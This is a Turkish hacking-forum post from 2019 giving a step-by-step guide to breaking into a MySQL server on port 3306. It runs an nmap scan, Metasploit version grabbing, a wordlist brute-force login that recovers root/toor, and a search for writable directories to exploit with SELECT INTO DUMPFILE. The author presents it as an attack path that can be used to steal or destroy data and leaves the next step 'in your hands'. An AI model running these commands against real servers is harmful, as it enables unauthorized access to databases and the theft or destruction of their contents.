Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Web & Server Güvenliği

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.



[Dev Konu ] MySql Sızma // Port 3306 // RootAdam

Web & Server Güvenliği

Yeni Konu aç Cevapla
 
Seçenekler
Alt 09-01-2019 15:41   #1
  • Üsteğmen
  • Üye Bilgileri
Üyelik tarihi
12/2018
Nereden
OLSUN ?
Mesajlar
Konular

Teşekkür (Etti): 169
Teşekkür (Aldı): 244


Exclamation [Dev Konu ] MySql Sızma // Port 3306 // RootAdam






Merhaba Ben RootAdam Bu Konumda MYSQL 3306 Porttan Sızma Yollarını Gösterecğim Umarım Yararlı Olur ...


~ MYSQL 3306 PORT SIZMA ~


~~ BİLGİ TOPLAMA ~~

Tarama, sızdırma testlerinde önemli bir rol oynar, çünkü tarama saldırganı saldırı için hangi hizmetlerin ve açık bağlantı noktalarının kullanılabilir olduğundan emin olur

Burada 3306 numaralı portu taramak için nmap kullanıyoruz !


Kod:
  nmap -sT 192.168.1.216







Saldırgan, Banner Grabbing olarak bilinen yazılım sürümü gibi önemli bilgilerini bulmak O Sistem Hakkında Bilgi Veririr M e t a s p l o i t Kullanacağız !

Kod:
 
use auxiliary/scanner/mysql/mysql_version
msf auxiliary(mysql_version) > set rhosts 192.168.1.216
msf auxiliary(mysql_version) > set rport 3306
msf auxiliary(mysql_version) > run






~~ MYSQL (Kaba Kuvet Saldırısı ) Brute Force Attack ~~




Kod:
 msf > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(mysql_login) > set rhosts 192.168.1.216
msf auxiliary(mysql_login) > set rport 3306
msf auxiliary(mysql_login) > set user_file /root/Desktop/users.txt
msf auxiliary(mysql_login) > set pass_file /root/Desktop/password.txt
msf auxiliary(mysql_login) > run

Bu kaba kuvvet saldırısını başlatır ve user.txt ve pass.txt dosyasını kullanarak geçerli kullanıcı adı ve şifre kombinasyonunu eşleştirmeye çalışır...






mysql sunucumuzun kaba kuvvet saldırısına karşı güvenli olmadığını görebilirsiniz, çünkü kullanıcı adı: root ve password: toor

Geçerli kimlik bilgilerini aldıktan sonra, veritabanı bilgilerini çalmak veya yok etmek için doğrudan mysql sunucusuna giriş yapabilir...

~~ SIZMA ~~




Giriş yaptıktan sonra MySQL SELECT INTO DUMPFILE özelliğini kullanarak yazma , düzeneleme v.s yetkimizin olduğu Dizini Bulacağız m e t a s p l o i t i kullanacağız .


Kod:
  
use auxiliary/scanner/mysql/mysql_writable_dirs
msf auxiliary(mysql_writable_dirs) > set rhosts 192.168.1.216
msf auxiliary(mysql_writable_dirs) > set username root
msf auxiliary(mysql_writable_dirs) > set password toor
msf auxiliary(mysql_writable_dirs) > set DIR_LIST/root/Desktop/file.txt
msf auxiliary(mysql_writable_dirs) > run




Gördüğünüz Gibi /tmp Dizininde Yazma Yetkimiz Var Sonrası Sizin Ellerinizde



TEŞEKKÜRLER ...
İYİ FORUMLAR ...





___________________________________________



SELAM SANA
EY YILLARI HEBA OLAN GENÇ!



ᎷᎩ ᏁᏗᎷᏋ ᎥᏕ ƦƠƠƬ





Konu RootAdam tarafından (09-01-2019 16:07 Saat 16:07 ) değiştirilmiştir..
 Offline  
 
Alıntı ile Cevapla
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Siber Güvenlik
Pomeranian Boo
instagram takipci hilesi

wau